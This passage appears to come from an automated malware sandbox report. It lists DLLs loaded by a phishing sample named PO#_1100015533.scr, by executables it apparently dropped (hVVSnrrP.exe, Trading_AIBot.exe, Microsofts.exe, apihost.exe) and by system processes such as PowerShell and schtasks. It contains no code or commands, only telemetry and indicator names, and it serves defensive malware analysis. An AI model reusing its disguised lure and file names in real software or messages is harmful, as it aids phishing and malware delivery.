                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: wow64win.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: wow64cpu.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: credssp.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winsta.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: davhlpr.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: wkscli.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: cscapi.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: netutils.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: browcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: linkinfo.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ntshrui.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: cscapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: credssp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: wsock32.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: webengine4.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: version.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ehtrace.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: slc.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winhttp.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: webio.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: mpr.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: secur32.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ehetw.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winmm.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: msdmo.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winnsi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: slc.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: winhttp.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: webio.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: mpr.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: secur32.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: ehetw.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\ehome\ehsched.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\ieetwcollector.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64win.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64cpu.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: webio.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: version.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: webio.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cryptdll.dll
